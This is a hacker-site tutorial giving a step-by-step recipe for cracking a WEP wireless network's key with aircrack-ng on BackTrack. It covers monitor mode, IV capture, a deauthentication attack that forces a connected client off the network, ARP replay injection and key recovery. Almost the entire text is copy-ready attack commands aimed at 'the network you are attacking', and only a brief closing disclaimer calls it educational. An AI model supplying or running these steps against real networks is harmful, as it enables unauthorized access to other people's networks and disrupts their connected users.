TheTAZZone - Internet Chaos

Tutorial- Aircrack on Backtrack with clients (WEP)


Do not use, republish, in whole or in part, without the consent of the Author. TheTAZZone policy is that Authors retain the rights to the work they submit and/or post…we do not sell, publish, transmit, or have the right to give permission for such…TheTAZZone merely retains the right to use, retain, and publish submitted work within it’s Network

Ok, this tutorial should be pretty straightforward and easy, then again, thats the entire idea behind a tutorial right? Anyway, to business, this tutorial will show you how to crack WEP very quickly using the aircrack on the backtrack security liveCD, that you can find here;

**quick note, cracking WEP with no clients will be out tonight/sometime real soon**

We will go over
1) Putting your atheros based card into monitor mode
2) Getting packet injection ready
3) injecting/sniffing
4) Cracking the WEP

This is the easier method, the one where the WEP has clients present, and you can use a deauth attack on them. Ok, enough talk, to business!

Monitor Mode

The first thing to do is boot up backtrack, basically by booting to a CD like you normally would, if you can’t figure this out, ask down below, or go use google. login to backtrack under root (password ‘toor’), and then type “startx” into the command line to start out GUI.

Sweet, now we are running *nix, and we can start the good stuff. Open up a command line, but clicking on the icon that looks like one on the bottom next to the ‘start’ type thingy (let me know if I get to technical :) )

Now, we need to enter this into the command line;

Code: Select all
$ airmon-ng start wifi0 6

**starts wifi0 on channel 6, change for the channel of the network you are attacking, use kismet for this, not covered in this tutorial**

$ wlanconfig ath0 destroy
$ ifconfig ath1 up
$ iwconfig ath1 mode monitor 6

Sweet, now we have our card in monitor mode, and we can move onto bigger and better things.

Start up Airodump and getting some info ready

ok, lets start airodump so we can get some info out of it, and then we can just leave it running.

Code: Select all
$ airodump-ng --ivs --write bob --channel 6 ath1

**basically heres what each thing means;
--ivs= only write the weak IV's, not every packet
--write= the prefix of the file we are writing to, so bob.ivs
--channel= the channel to scan on
ath1= our network device**

Now that airodump is running, we need to snag a couple pieces of information from it, 1) The MAC address of the AP we are attacking, it’ll be in the first column. 2) the MAC address of a computer connected to that network.

Now, open up a new terminal (DON”T CLOSE AIRODUMP). type these lines in;

Code: Select all
$ export AP=mac_of_ap
$ export MAC=mac_of_connected_computer

This basically just stored those as variables, so you don’t have to type them a bunch of times in the coming steps.

Getting everything ready

Good, now we have airodump running, and we can move onto getting packet injection ready. In the new console we opened up to export things into our new variables type in the following, but do NOT run it yet;

Code: Select all
$ aireplay-ng -0 10 -a $AP -c $MAC ath1

ok, we are running aireplay-ng attack 0 ten times ("-0 10"), which is a death attack, it means we will kick them off the network, so we can steal their ARP packets, to replay them. "-a" is the MAC address of the AP we are attacking that we stored before, -c is the client we are deauthing, and again ath1 is our interface

Now, lets get aireplay ready to snag those ARP packets we are going to get;

Code: Select all
$ aireplay-ng -3 -b $AP -h $MAC ath1

really quickly, this is attack number 3, it will wait until it finds an arp packet it can replay, it will ask you if you want to use the packet it finds, say yes (type in y, press enter), and it will replay them, getting you alot of IV's

Good, everything is ready, on to the actual thing!

The Attack!

Now, we have 2 attacks just chillin there ready to go, and airodump still in the background running. Start attack number 3 (the replay) first, then run your deauth attack. The replay attack will eventually find a packet, and it will ask if you want to use that one, say yes (type in y). Now look at airodump!

Your #data column should be shooting up on the AP you are attacking! It took me about 3 minutes to collect 100k data, more then enough for a 64bit WEP key. Now, to crack the key, we need to type in one more command, and wait less then a minute. You don’t have to close anything, or stop airodump/aireplay.

Go to the window we used for the deauth attack, and type in this command;

Code: Select all
aircrack-ng -n 64 -b $AP *.ivs

poof, aircrack should start, and in a few moments, you should have your WEP key! If not, wait a bit longer, and try again. If all else fails, it might be a 128 bit, and you will need about a million #data’s, and change “-n 64” to “-n 128”, and try again. If you don’t get it then, I don’t know what to tell you!

I hope you learned something/got an idea of something, and you enjoyed yourself! Remember, Soon I will be posting cracking WEP on a network with no clients present.

**Obligatory Disclaimer; This tutorial was written as an education piece, cracking into somebody else’s network is illegal and punishable by fine/jail. Don’t be stupid**

One Response to Tutorial- Aircrack on Backtrack with clients (WEP)

  1. Vinoth July 25, 2009 at 4:05 am

    Why we need to have our card in monitor mode ?

Leave a Reply

Your email address will not be published. Required fields are marked *


If you'd like to advertise on The Mutt ( aka ) feel free to contact us at: administration[at]

TheTAZZone is a non-commercial entity. We do not sell any products or services ourselves. Our revenue comes from advertising and donations only.

We appreciate your support! Your advertising revenue ( or donations ) helps us to continue to upgrade, improve, and offset the costs of maintaining this site.

Donations can be made through the page ' Donate '.